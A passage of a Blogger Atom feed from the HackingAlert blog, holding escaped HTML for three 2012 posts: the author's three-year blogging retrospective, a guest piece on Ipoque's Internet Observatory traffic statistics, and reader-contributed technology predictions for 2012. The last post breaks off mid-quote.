Alone in India the blog has a traffic rank close to 15,000 and links in more than 120 different websites.&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-0XxJ9NkyVo0/Tx2qsgDgD7I/AAAAAAAABCY/sYmouEYVCz0/s1600/blog1.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;177&quot; src=&quot;http://1.bp.blogspot.com/-0XxJ9NkyVo0/Tx2qsgDgD7I/AAAAAAAABCY/sYmouEYVCz0/s640/blog1.PNG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;The blog traffic has grown by more than 200% in past one year and so far the blog has&amp;nbsp;received&amp;nbsp;a total of around 7 lakh hits. Soon it will hit one million. The above image shows the rapid growth in traffic for the year 2011. There were only few thousand hits in the early days, but today the blogs daily hit is double of the number of hits it got in year 2009. From past three months the blog has&amp;nbsp;received&amp;nbsp;more than 1 lakh hits per month which accounts to nearly 40% of total blog traffic.&lt;br /&gt;&lt;br /&gt;In its 3 years of operation the blog has built up a community of more than 2500 followers and 1600 subscribers. Though the figure may seem small but the increase is two fold in the recent few months.&lt;br /&gt;The blog contains more than 250 posts out of which around 50 posts appear on the top page of Google result. Visibility in search result plays a key factor in building a healthy traffic. 
The quality of a post is always the dominant factor in ranking high in search queries.&lt;br /&gt;&lt;br /&gt;HackingAlert now ranks amongst the top 10 blogs on computers/technology/hacking in India (Indiblogger stats).&lt;br /&gt;&lt;br /&gt;It also ranks second on Networkedblog (biggest hub for blogs on Facebook) in the category of Hacking and network security.&lt;br /&gt;&lt;br /&gt;HackingAlert has also featured in some of the top Information security magazines and portals like The Hacker News, Voice of Grey hat, HACKER5, Hack9 etc.&lt;br /&gt;More than 15 different articles have been published so far.&lt;br /&gt;&lt;br /&gt;&amp;nbsp;The success of HackingAlert also brought me lots of&amp;nbsp;appreciation. It gave me a platform to share my knowledge with others and in turn learn from others. The quest for taking the blog to new heights always pushed me to keep looking for new things. This helped me to report several vulnerabilities in some of the top ranked websites. The&amp;nbsp;appreciation&amp;nbsp;of my readers helped me in publishing several papers and vulnerability submissions. The best of me could not have been possible without the comments and support that people showed.&lt;br /&gt;The blog not only helped me in improving my knowledge but it also helped me in improving my writing skills. This attracted one of the prominent publishing houses of London, PACKT publishers. They publish books related to computer science and they offered me the chance to write a book which will be a worldwide release.&lt;br /&gt;Never in my dreams had I thought that free blog hosting would one day make me an international author.&lt;br /&gt;Well, the story didn&#39;t end there; the blog also attracted some of the industry people as well. It brought me some good job offers and consultancy work. 
I can proudly say that HackingAlert has played a big role in helping me find a job in the world&#39;s number 1 security company, Symantec.&lt;br /&gt;&lt;br /&gt;It certainly sounds like a story, but it&#39;s true, at least for me. I did put in a lot of effort behind my blog. At times I did feel like giving up, shutting down. But something inside me always pushed me to try harder.&lt;br /&gt;I am really thankful to all my readers for reading my posts and commenting on them. It is the comments and appreciation that have kept me going for the past 3 years and I have felt that my hard work has paid off now.&lt;br /&gt;The best of this blog would not have been possible without the support of you readers.&lt;br /&gt;&lt;br /&gt;People generally don&#39;t take blogging seriously. But it teaches you the real ethics of the internet. It teaches you a part of web technology, a part of social networking, a part of search engine optimization, a part of networking, a part of technology and everything you want to blog about. It does make you a complete geek and provides you a platform where you can share your ideas and knowledge. I find blogging far more interesting than wasting time on facebook or other social networks. I wrote this blog not to make a story about myself, but to inspire people, especially my readers. I don&#39;t say that I have done something too big, but at least I can tell the importance that web and blogging can play in one&#39;s life and how we can use it to our&amp;nbsp;benefits.&lt;br /&gt;&lt;br /&gt;Google Chrome&#39;s tagline says &quot;The Web is what you make out of it&quot;. This line inspires me a lot. It makes me feel that the web is my own and I can use it the way I want. I chose to make my web as a blog, a place to communicate with like-minded people. I want this to be the story of every individual who comes to my blog. Don&#39;t blog to just earn money out of advertisements. 
use it to share knowledge and you will surely get rewarded for it one day.&lt;br /&gt;&lt;br /&gt;I end this post by thanking all my readers for their support. I wish HackingAlert keeps providing you relevant information for many more years to come.&lt;br /&gt;&lt;br /&gt;-------------------- 3 years completed ------------LYNS---------------DARKLORD!!-----------------&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingalert.blogspot.com/feeds/2593672862184553912/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackingalert.blogspot.com/2012/01/from-free-blog-hosting-to-international.html#comment-form' title='11 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/2593672862184553912'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/2593672862184553912'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/2012/01/from-free-blog-hosting-to-international.html' title='From free blog hosting to International Author - A journey of 3 years'/><author><name>abhinav singh</name><uri>http://www.blogger.com/profile/03102629587741077690</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://2.bp.blogspot.com/_MMJcoBRgsn4/SemPx5VvY3I/AAAAAAAAAA4/VZyEY96SW6o/S220/abhinavbom.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/--umUwyJcDh8/Tx25Nh93p3I/AAAAAAAABCg/u67WG7vDDrE/s72-c/three.jpg" height="72" width="72"/><thr:total>11</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7708828398385990720.post-1310073012221492484</id><published>2012-01-07T02:43:00.001+05:30</published><updated>2012-01-07T02:43:56.774+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" 
term="hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="technical article"/><category scheme="http://www.blogger.com/atom/ns#" term="technology news"/><title type='text'>Internet Observatory Setting New Heights with Real-Time IP Traffic Trends</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;script src=&quot;http://connect.facebook.net/en_US/all.js#xfbml=1&quot;&gt;&lt;/script&gt;&lt;fb:like font=&quot;arial&quot; href=&quot;http://www.facebook.com/pages/HackingAlert/131456493581478&quot; layout=&quot;button_count&quot; show_faces=&quot;true&quot; width=&quot;450&quot;&gt;&lt;/fb:like&gt; &lt;br /&gt;&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-LuE-S2NJz8I/TwdjY8D7zII/AAAAAAAABCM/k1OBu_-1bTE/s1600/is.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://2.bp.blogspot.com/-LuE-S2NJz8I/TwdjY8D7zII/AAAAAAAABCM/k1OBu_-1bTE/s1600/is.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;i&gt;Hello Friends. Here is a guest post from Adriana Jones on a very interesting topic. Special thanks to Adriana from HackingAlert for sharing this article. You can find her bio at the end of the article.&lt;/i&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;It is like a watchful eye always hovering over the Internet. It is like someone keeping the Internet users on a leash. What is it actually? It is nothing but a service or a service offered by a website which has the task of monitoring global traffic 24 hours a day across various regions in the globe. It is better known as ‘Internet Observatory’ which is a venture of Ipoque, the well-known German traffic management company. 
The task of Internet Observatory is to offer insights into the real time IP traffic trends and bring forth the real numbers for bandwidth consumption by various applications.&lt;br /&gt;All the tracking is impressive and internet providers are going to be helped by it. Internet Observatory has been launched as a free service monitoring Internet traffic around the globe round the clock.&lt;br /&gt;Prior to the launch of the Internet Observatory, Ipoque’s Internet Studies have been a continuous source of Internet traffic statistics since its inception back in the year 2006. Ipoque was in charge of generating yearly reports which showcased granular statistics of the Internet traffic covering eight regions of the world. Though the reports were detailed, it was found that the data were just snapshots of the Internet traffic patterns covering a certain period of time. Internet Observatory on the other hand generates real time IP traffic trends; that is live data, 24 hours a day and that too not just snapshots but real long term statistics.&lt;br /&gt;Launched at the Broadband World Forum in Paris, the statistics generated by Internet Observatory give a real insight into the amount of traffic caused by P2P, the competition between Skype traffic and SIP traffic, as well as which Instant messaging client is enjoying a steady and increased flow of traffic. A close study of the statistics generated will reveal that P2P traffic in Europe claims a huge share which stands for nearly more than a quarter of all bandwidth along with 40% of the packets sent. It has been traced that nearly all of it comes from BitTorrent whose traffic exceeds 50% during night. Even with geographic limitations, Internet Observatory is successful in generating interesting IP traffic trends which are vital for internet providers around the world.&lt;br /&gt;The Internet observatory is sort of a real entity in the world of Internet.
According to Klaus Mochalski, the person behind this real time IP traffic trends monitoring project at Ipoque, Internet Observatory is set to become something which is coined as ‘Internet Seismograph’. In his words, Internet Observatory is going to be a kind of information service provider that will bring reliable data generated once per hour regarding how Internet users across the globe utilize the resources to all those who wants to know.&lt;br /&gt;Though Internet Observatory is generating real time IP traffic trends in the Europe region only, Ipoque assures that it will soon cover other regions including America, Middle East, Africa, Asia and Australia. A follow up project of Ipoque after Internet Statistics, Internet Observatory gets all the support in data collection from Ipoque’s prestigious clients and partners.&lt;br /&gt;For those who will benefit from the live IP traffic statistics including internet providers around the world, Internet Observatory is a store house of valuable information about Internet traffic. Equal interest and support from the Internet Community is also giving the project a boost. As an instance cited by those behind the project, data collected by the Internet Observatory is being contributed to an ICT statistics project which is sponsored by the European Commissions. Despite being a modular project, Internet Observatory is yet to evolve. The appreciation has given a new zeal to those behind the project to take it further and extend data coverage. All the real time IP traffic trends are being projected as line, pie or area charts taken over different time intervals.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;u&gt;About the Author&lt;/u&gt;&lt;/b&gt;: &lt;i&gt;Adriana Jones is a Freelance and Staff writer who writes informative articles on &lt;a href=&quot;http://www.broadbandexpert.com/high-speed-internet/&quot; target=&quot;_blank&quot;&gt;internet providers&lt;/a&gt; in different areas. 
She is an expert on topics related to cables internet providers, broadband services, telecom etc.&lt;/i&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingalert.blogspot.com/feeds/1310073012221492484/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackingalert.blogspot.com/2012/01/internet-observatory-setting-new.html#comment-form' title='9 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/1310073012221492484'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/1310073012221492484'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/2012/01/internet-observatory-setting-new.html' title='Internet Observatory Setting New Heights with Real-Time IP Traffic Trends'/><author><name>abhinav singh</name><uri>http://www.blogger.com/profile/03102629587741077690</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://2.bp.blogspot.com/_MMJcoBRgsn4/SemPx5VvY3I/AAAAAAAAAA4/VZyEY96SW6o/S220/abhinavbom.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-LuE-S2NJz8I/TwdjY8D7zII/AAAAAAAABCM/k1OBu_-1bTE/s72-c/is.jpg" height="72" width="72"/><thr:total>9</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7708828398385990720.post-8440642449543357091</id><published>2012-01-07T02:19:00.001+05:30</published><updated>2012-01-07T02:19:59.933+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="technical article"/><category scheme="http://www.blogger.com/atom/ns#" term="technology news"/><title type='text'>Technologies that will heat up in 2012</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; 
trbidi=&quot;on&quot;&gt;&lt;script src=&quot;http://connect.facebook.net/en_US/all.js#xfbml=1&quot;&gt;&lt;/script&gt;&lt;fb:like font=&quot;arial&quot; href=&quot;http://www.facebook.com/pages/HackingAlert/131456493581478&quot; layout=&quot;button_count&quot; show_faces=&quot;true&quot; width=&quot;450&quot;&gt;&lt;/fb:like&gt; &lt;br /&gt;&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;&lt;br /&gt;Hello Friends. Lets start the new year with the first post contributed by many readers. Its never easy to predict the flow of technology as it can be at times&amp;nbsp;turbulent&amp;nbsp;and at times mild. Still HackingAlert collected some&amp;nbsp;advice&amp;nbsp;from its readers. So here are a few technologies that can shine up in 2012.&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;color: cyan; font-size: large;&quot;&gt;&lt;i&gt;Tablets&lt;/i&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://4.bp.blogspot.com/-D3_K5aeq9cM/TwdNAwgwsmI/AAAAAAAABAs/rD-r0jfB0m0/s1600/tab.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;133&quot; src=&quot;http://4.bp.blogspot.com/-D3_K5aeq9cM/TwdNAwgwsmI/AAAAAAAABAs/rD-r0jfB0m0/s200/tab.jpg&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Undoubtedly tablets will outshine smart phones in 2012. With the dominance of ipad2 and samsung galaxy, the market will surely heat up with new players like HTC, Blackberry. In 2011 tablet sales contributed to 12% of PC market. More than 2% of internet population has shifted to tablets. These stats are sure to double this year in 2012. 
The year is certainly going to be a tablet boom with much awaited products lined up like ipad3, ice-cream sandwitch tablets etc. Alone in India, the launch of world&#39;s cheapest tablet Akash has recieved even more demand than ipad. So far 1.5 million Akash devices have been booked online.&lt;br /&gt;&lt;b&gt;&lt;u&gt;Contributors for this technology:&amp;nbsp;&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-KxK3BybGZms/TwdOLjMeMYI/AAAAAAAABA0/bnkXD6bu06c/s1600/cont1.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://3.bp.blogspot.com/-KxK3BybGZms/TwdOLjMeMYI/AAAAAAAABA0/bnkXD6bu06c/s1600/cont1.PNG&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;b&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;color: cyan; font-size: large;&quot;&gt;&lt;i&gt;Semantic Web&lt;/i&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-G0X3Kfc5ZPU/TwdP4dvMTYI/AAAAAAAABA8/sz81is4y-DM/s1600/semantic.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://3.bp.blogspot.com/-G0X3Kfc5ZPU/TwdP4dvMTYI/AAAAAAAABA8/sz81is4y-DM/s1600/semantic.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style=&quot;color: cyan; font-size: large;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;Semantic web means a web of data that allow machines to 
understand that meaning of data or information written over the World Wide Web. In the existing webs various tasks like searching for a book, downloading a movie, searching for the lowest available prices etc. are performed by human interventions because webs are designed to be read by human not by machines. But in semantic webs information can be interpreted by machines and such type of task can be accomplished without human interventions. &amp;nbsp;If &amp;nbsp;User want to search something over the internet, search engine will display all the content whether relevant or irrelevant for user. User have to find again relevant data whereas, in semantic technologies computer reads the word or phrase searched a user using search engine and produce the specific relevant result by the means of artificial intelligence techniques. In the web 3.0 there will be no need for you to be a programmer before editing the site,the user of the site will also be a modifier and editor.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;b&gt;&lt;u&gt;Contributors For this technology&lt;/u&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-SmFAD31pEy4/TwdP5_7WYFI/AAAAAAAABBE/cp9IcBhDOoM/s1600/cont2.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://1.bp.blogspot.com/-SmFAD31pEy4/TwdP5_7WYFI/AAAAAAAABBE/cp9IcBhDOoM/s1600/cont2.PNG&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: cyan; font-family: inherit; font-size: large;&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;i&gt;NFC &amp;amp; 
M-Commerce&lt;/i&gt;&lt;/u&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-yUrXCYcycGU/TwdSVeb7_tI/AAAAAAAABBM/RJVn-UZJfY0/s1600/nfc.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;187&quot; src=&quot;http://2.bp.blogspot.com/-yUrXCYcycGU/TwdSVeb7_tI/AAAAAAAABBM/RJVn-UZJfY0/s200/nfc.jpg&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;Well The two technologies are different but they are almost inter-related.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Imagine tapping your phone to a receiver at a register, and instantly paying for an item without fumbling for your wallet. Or getting into a movie theater with a similar tap of your phone. Or being able to load your transit card onto your phone, using a simple tap to deduct money for every trip on the subway.&lt;br /&gt;All of that is already possible with the help of near-field communication chips, which transfer small amounts of data through a short-range, low-friction connection.&lt;br /&gt;Currently, you can buy the Google Nexus S phone, which carries an NFC chip and the Google Wallet companion app for syncing your credit cards to your phone and making mobile payments at participating vendors. Meanwhile, RIM is baking NFC chips into newer phones such as the BlackBerry 9900, and recently it introduced Tag, a RIM-specific feature that allows BlackBerry users to transfer contact information and documents. 
Growth in NFC enabled devices will surely bring a boom in M-Commerce.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;b&gt;&lt;u&gt;Contributors for this technology&lt;/u&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-VwMQsCpt9h8/TwdSXCeC9II/AAAAAAAABBU/AIClKeZspUE/s1600/cont3.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://2.bp.blogspot.com/-VwMQsCpt9h8/TwdSXCeC9II/AAAAAAAABBU/AIClKeZspUE/s1600/cont3.PNG&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;color: cyan; font-size: large;&quot;&gt;&lt;i&gt;Human Sensing Commands&lt;/i&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;color: cyan; font-size: large;&quot;&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-Sdi3NM-ThBc/TwdUvf6EwxI/AAAAAAAABBc/kLSXfsHh_Kk/s1600/siri.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;200&quot; src=&quot;http://2.bp.blogspot.com/-Sdi3NM-ThBc/TwdUvf6EwxI/AAAAAAAABBc/kLSXfsHh_Kk/s200/siri.jpg&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;Well NO one reported about this technology but I believe that human 
sensing commands like Voice commands and touch commands will be the main focus in 2012. Let&#39;s talk a bit in detail. Siri has already shocked the world with its unique way of sensing human voices. Similarly Android is rolling out its face recognition phone unlock technology in Android 4.0 enabled smart phones and tablets. But my pick of the year will be Windows 8. Obviously Microsoft is taking a very bold and ambitious move by single handedly tackling the PC market by launching a completely touch based operating system. It&#39;s tough to predict the success of Windows 8 but I certainly believe that Microsoft will have an upper hand in it. The excellence of Windows will surely impress the users and force them to shift from mouse and keyboard to Touch screens.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: cyan; font-family: inherit; font-size: large;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;u&gt;On Demand TV content / Internet TV&lt;/u&gt;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: cyan; font-family: inherit; font-size: large;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-PWrIZLvfJbA/TwdXCWVnmzI/AAAAAAAABBk/427PY8wdnRw/s1600/tv.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://1.bp.blogspot.com/-PWrIZLvfJbA/TwdXCWVnmzI/AAAAAAAABBk/427PY8wdnRw/s1600/tv.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;Internet is everywhere now. We are connected and surrounded by it. TV is the next big platform where the world wide web is searching for possibilities and year 2012 is going to be crucial for it.
Though internet and on demand TV have been in market for quiet some time but they have not reached the masses. It is yet to catch attention. But what special will happen in 2012? Apple TV is the answer. Apple is the&amp;nbsp;&lt;/span&gt;pioneer&lt;span style=&quot;font-family: inherit;&quot;&gt;&amp;nbsp;for several technologies and with the entry of Apple in this segment, you can surely bet your money on it. Players like Google, Logitech are already in market but the success rate is still slow. The shift of apps on TV will surely provide a new taste to tech savy people.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;b&gt;&lt;u&gt;Contributors for this technology&lt;/u&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-0gwZNavN2Ys/TwdXDTXPfcI/AAAAAAAABBs/kV6QXJF3f40/s1600/cont4.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://2.bp.blogspot.com/-0gwZNavN2Ys/TwdXDTXPfcI/AAAAAAAABBs/kV6QXJF3f40/s1600/cont4.PNG&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: cyan; font-family: inherit; font-size: large;&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;i&gt;Dual Core Mobile Processors&lt;/i&gt;&lt;/u&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: cyan; font-family: inherit; font-size: large;&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;i&gt;&lt;br 
/&gt;&lt;/i&gt;&lt;/u&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-SKeUIXV8Lhk/TwdaMjxMT7I/AAAAAAAABB0/RBm05HxE05o/s1600/dual.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;149&quot; src=&quot;http://1.bp.blogspot.com/-SKeUIXV8Lhk/TwdaMjxMT7I/AAAAAAAABB0/RBm05HxE05o/s200/dual.jpg&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style=&quot;color: cyan; font-family: inherit; font-size: large;&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;/u&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;In 2011, the Motorola Atrix and the Droid Bionic were the first commercially popular smartphones to sport dual-core processors. In the fall, Apple’s iPhone 4S followed suit--and now it seems unlikely that any smartphones unveiled in 2012 will be competitive unless they can offer the same processing power that Apple’s phones do.&lt;br /&gt;As a result, you should expect to see a surge in dual-core mobile devices. ARM executive James Bruce, whose company licenses the designs of chips that find their way into almost every mobile device in the world, said in a May interview that dual-core processors would be a huge part of making smartphones not just powerful but also battery-efficient.“If you look at handsets today, we’ve seen dual-core handsets reduce power consumption,” he says. 
